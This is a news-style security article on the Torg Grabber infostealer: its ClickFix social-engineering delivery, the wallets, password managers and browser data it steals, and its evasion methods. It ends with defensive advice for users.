A newly discovered infostealer has sent shockwaves through the cybersecurity community. Torg Grabber malware, identified by researchers at Gen Digital, targets 728 cryptocurrency wallet browser extensions, along with hundreds of password managers, two-factor authentication tools, and note-taking apps. It spreads through social engineering, moves fast, and goes after virtually every digital asset a victim might have.
This is not a niche threat. From MetaMask to obscure wallets most users have never heard of, Torg Grabber casts one of the widest nets ever seen in an infostealer campaign.
What Is Torg Grabber?
Torg Grabber is an infostealer — a type of malware built to quietly harvest sensitive data from an infected device and send it back to the attacker. Unlike ransomware, which locks files and demands payment, infostealers operate in the shadows. The victim often has no idea anything happened until accounts are drained or credentials appear for sale on dark web markets.
What makes Torg Grabber stand out is its sheer scope. Researchers documented 334 unique malware samples compiled in just three months, between December 2025 and February 2026. New command-and-control servers were registered every week throughout that period. This is not the work of a lone actor experimenting in their spare time. This is a production operation.
The malware also appears to be offered as a service. By the time researchers completed their analysis, 40 operator tags had been documented, suggesting a growing customer base of cybercriminals using Torg Grabber as a ready-made tool.
How It Gets Onto Your Device
Torg Grabber spreads through a technique called ClickFix. It works through social engineering rather than technical exploits, which makes it harder to defend against using traditional security tools.
A victim visits a compromised or malicious website and sees a convincing pop-up. The message might claim their browser needs a critical security update. A fake progress bar ticks away for several minutes to make the scenario feel legitimate. While the user waits, the malware is already executing in the background.
At the end of the fake process, the user is prompted to run a PowerShell command, believing it is part of the update. That command delivers the malware payload. Researchers have also seen this technique deployed through fake game cheat tools and cracked software downloads. The lure changes, but the mechanism stays the same.
What Torg Grabber Steals
The scope of what this malware targets is extraordinary. The headline figure is 728 cryptocurrency wallet browser extensions, covering everything from household names like MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, and OKX, to deeply obscure projects with tiny user bases. The thoroughness of the list suggests it was compiled systematically, not curated manually.
Beyond wallets, Torg Grabber targets 103 password managers and two-factor authentication extensions. The list includes LastPass, 1Password, Bitwarden, NordPass, Dashlane, and ProtonPass, among others. It also goes after 19 note-taking extensions, because users sometimes store passwords or recovery phrases in apps like these.
The malware scans 25 Chromium-based browsers and 8 Firefox variants, stealing saved credentials, cookies, and autofill data. Session cookies are particularly dangerous. They allow an attacker to log into accounts as if they were the victim, often bypassing the need for a password entirely.
Torg Grabber also steals data from Discord, Telegram, Steam, VPN apps, FTP clients, and email applications. It takes screenshots, profiles the host system, documents installed software including 24 antivirus tools, and lifts files directly from Desktop and Documents folders.
How It Avoids Detection
Torg Grabber uses several techniques to stay hidden. The final payload runs entirely in memory, leaving fewer traces for endpoint security tools to find. It uses multi-layered obfuscation and direct system calls to bypass monitoring software.
One of its most notable capabilities is bypassing App-Bound Encryption, a browser security mechanism introduced in Chrome 127 to protect stored cookies. A standalone tool called “Underground” injects itself into the browser environment, accesses Chrome’s internal encryption service, and retrieves master keys. This gives Torg Grabber access to data that is supposed to be protected by design.
The malware has also evolved its infrastructure over time. Early versions used Telegram bots for data exfiltration. Then came a custom encrypted TCP protocol. The current iteration routes stolen data through Cloudflare via HTTPS, making traffic much harder to identify and block.
Final Thoughts
Torg Grabber malware represents a significant escalation in the infostealer threat landscape. Its combination of wide-net targeting, rapid development cycles, and layered evasion techniques makes it a serious risk for anyone who holds cryptocurrency, uses a password manager, or stores sensitive data in their browser.
The ClickFix delivery method is a reminder that technical defenses alone are not enough. Attackers are increasingly relying on tricking users rather than breaking through security tools. No legitimate software update will ever ask you to run a PowerShell command manually. If you see a prompt asking for that, close the browser immediately.
For crypto holders in particular, the safest approach is to use hardware wallets for significant holdings and treat browser-based wallets as temporary, low-value access points only. Regularly rotating credentials and enabling phishing-resistant two-factor authentication on all critical accounts also reduces the damage if an infostealer does land on your device.
